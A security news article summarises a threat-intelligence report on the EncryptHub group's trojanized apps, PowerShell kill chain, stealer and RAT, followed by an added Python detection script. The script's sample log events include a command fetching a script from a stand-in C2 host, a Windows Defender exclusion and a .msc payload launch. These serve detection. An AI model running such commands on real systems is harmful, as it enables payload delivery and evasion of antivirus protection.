
EncryptHub’s diamond model diagram | Image: Outpost24
A newly identified cybercriminal entity, EncryptHub, has gained attention from multiple threat intelligence teams, including Outpost24’s KrakenLabs. Their latest report exposes EncryptHub’s intricate multi-stage attack chain, its reliance on trojanized applications, and a remote access tool (RAT) still under development that may soon be commercialized in underground markets.
While prior analyses have shed light on this cybercriminal entity, KrakenLabs’ deep dive uncovers “previously unseen aspects of their infrastructure, tooling, and behavioral patterns”. The researchers reveal that EncryptHub made operational security (OPSEC) mistakes, inadvertently exposing critical parts of its ecosystem, including directory listings, stealer logs, and Telegram bot configurations used for data exfiltration and campaign tracking. These missteps provided an unprecedented opportunity to dissect EncryptHub’s methodologies, painting a clearer picture of their operations.
EncryptHub employs a combination of classic and emerging malware distribution techniques, including:
- Trojanized software – EncryptHub disguises malware inside fake versions of popular applications, including QQ Talk, WeChat, DingTalk, Google Meet, and Palo Alto GlobalProtect.
- Pay-Per-Install (PPI) services – The group partners with LabInstalls, an underground service that automates malware distribution via a Telegram bot.
- Credential prioritization – Stolen credentials are categorized based on their value, with particular interest in cryptocurrency wallets, corporate networks, and VPN users.
Once a victim installs a trojanized application, EncryptHub’s malware deploys in a multi-stage kill chain, beginning with PowerShell scripts that gather system information, steal credentials, and execute additional payloads.
- Stage 1: A PowerShell script, worker.ps1, collects system details (e.g., username, location, OS version) and forwards the data to a Command-and-Control (C2) server.
- Stage 2: The malware downloads and runs runner.ps1, which decodes and executes embedded files, using Microsoft Common Console (.msc) tricks to evade detection.
- Stage 3: The malware adds Windows Defender scanning exclusions for specific folders, reducing the likelihood that subsequent payloads are detected.
- Stage 4: A final payload deploys Rhadamanthys Stealer, an advanced information stealer targeting passwords, browser cookies, cryptocurrency wallets, and VPN sessions.
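The four stages above leave distinct traces in PowerShell script block logging; the following added example (not code from the Outpost24 report) correlates such traces per host. The log shape, the sample records and the regular expressions are constructed assumptions chosen to mirror the stage descriptions, not indicators taken from the report.

```python
import re
from collections import defaultdict

# Constructed sample records shaped like PowerShell script block log entries
# (host name, script text). These are illustrative, not real captured logs.
SAMPLE_EVENTS = [
    ("HOST-A", "Invoke-WebRequest -Uri hxxp://c2.invalid/worker.ps1 -OutFile $env:TEMP\\worker.ps1"),
    ("HOST-A", "Add-MpPreference -ExclusionPath $env:TEMP"),
    ("HOST-A", "Start-Process mmc.exe -ArgumentList \"$env:TEMP\\payload.msc\""),
    ("HOST-B", "Get-ChildItem C:\\Users\\alice\\Documents"),
]

# One rule per stage of the chain summarised above. The rule name prefix is the
# stage it belongs to; the patterns are assumptions about the script text.
RULES = {
    "stage1_recon_script": re.compile(r"worker\.ps1", re.I),
    "stage2_loader_script": re.compile(r"runner\.ps1", re.I),
    "stage2_msc_execution": re.compile(r"\.msc\b", re.I),
    "stage3_defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I),
}


def match_rules(script_text):
    """Return the names of every rule that fires on one script block."""
    return [name for name, rx in RULES.items() if rx.search(script_text)]


def correlate(events):
    """Group rule hits per host so stages from separate blocks are seen together."""
    per_host = defaultdict(set)
    for host, text in events:
        per_host[host].update(match_rules(text))
    return {host: sorted(hits) for host, hits in per_host.items()}


def hosts_with_chain(events, min_stages=2):
    """Hosts where at least min_stages distinct stages were observed.

    Requiring several stages on the same host keeps a lone .msc launch or a
    single exclusion change (both legitimate in many environments) from alerting.
    """
    flagged = {}
    for host, hits in correlate(events).items():
        stages = {hit.split("_")[0] for hit in hits}
        if len(stages) >= min_stages:
            flagged[host] = sorted(stages)
    return flagged


if __name__ == "__main__":
    for host, stages in hosts_with_chain(SAMPLE_EVENTS).items():
        print(f"{host}: observed {', '.join(stages)}")
```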
EncryptHub is developing EncryptRAT, a remote access tool (RAT) with a C2 panel that allows attackers to:
- Manage infections
- Remotely execute commands
- Download stolen data
- Configure malware samples

Early indications suggest EncryptHub may commercialize EncryptRAT by selling it to other cybercriminals.
EncryptHub’s rapid evolution signals a growing threat to enterprises and individual users alike. Their tactics highlight a dangerous intersection between malware development and underground services that make it easier for cybercriminals to scale their attacks.
Organizations are advised to remain vigilant, monitor for malicious activity, and ensure their endpoint security solutions are up-to-date.
As KrakenLabs warns, this is only the first part of their investigation, with further findings expected to reveal even more surprises about EncryptHub’s cybercriminal activities.